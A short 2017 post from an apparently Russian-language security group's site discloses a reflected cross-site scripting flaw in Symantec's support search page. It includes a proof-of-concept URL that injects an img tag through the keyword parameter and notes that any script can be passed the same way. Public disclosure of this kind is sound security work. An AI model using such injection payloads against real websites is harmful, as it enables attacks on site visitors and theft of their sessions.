This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Перейти вверх
English, United Kingdom Svenska, Sverige
RSS
3.15.202.4.US
Новости Новости Работа Работа Сеть Сеть Форум Форум Галерея Галерея Хаблист Хаблист Инструменты Инструменты Статистика Статистика О нас О нас Войти Войти

They never learn: Symantec support page search form XSS bug

Vulnerable page: https://support.symantec.com/

PoC
https://support.symantec.com/en_US/search.html?keyword="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and keyword parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано RoLex в 2017-05-22 01:16 10 likes

Комментарии

There are no comments for this news article, you can leave one here.
← Ledokol 2.9.3.46 | AdvOR 0.3.1.3 →
3.15.202.4.US Авторские права © 2002-2024 Team Elite ⋅ Все права защищены ⋅ КукиПомощьСвязь 2 739 8520